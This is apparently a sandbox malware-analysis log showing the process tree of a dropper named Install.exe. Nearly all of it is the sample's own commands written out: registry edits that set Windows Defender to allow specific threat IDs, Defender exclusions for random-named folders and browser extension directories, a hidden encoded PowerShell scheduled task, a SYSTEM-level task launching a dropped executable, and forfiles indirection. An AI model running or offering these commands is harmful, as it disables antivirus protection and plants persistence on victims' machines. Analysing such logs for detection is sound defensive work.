C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:643⤵
-
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "gtzatWjGZ" /SC once /ST 00:46:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "gtzatWjGZ"
    [3] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "gtzatWjGZ"
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 10:32:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\DlRIpsJ.exe\" GH /smlMdidqG 385118 /S" /V1 /F
      - Drops file in Windows directory
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "XyyyteIMwZeutaZuw"
[1] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6360 -ip 6360
[1] C:\Users\Admin\AppData\Local\Temp\7zS9B18.tmp\Install.exe | C:\Users\Admin\AppData\Local\Temp\7zS9B18.tmp\Install.exe it /LKCdidakqp 385118 /S
    - Executes dropped EXE
  [2] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      [4] C:\Windows\SysWOW64\cmd.exe | /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell start-process -WindowStyle Hidden gpupdate.exe /force
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
          [6] C:\Windows\SysWOW64\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force
  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG 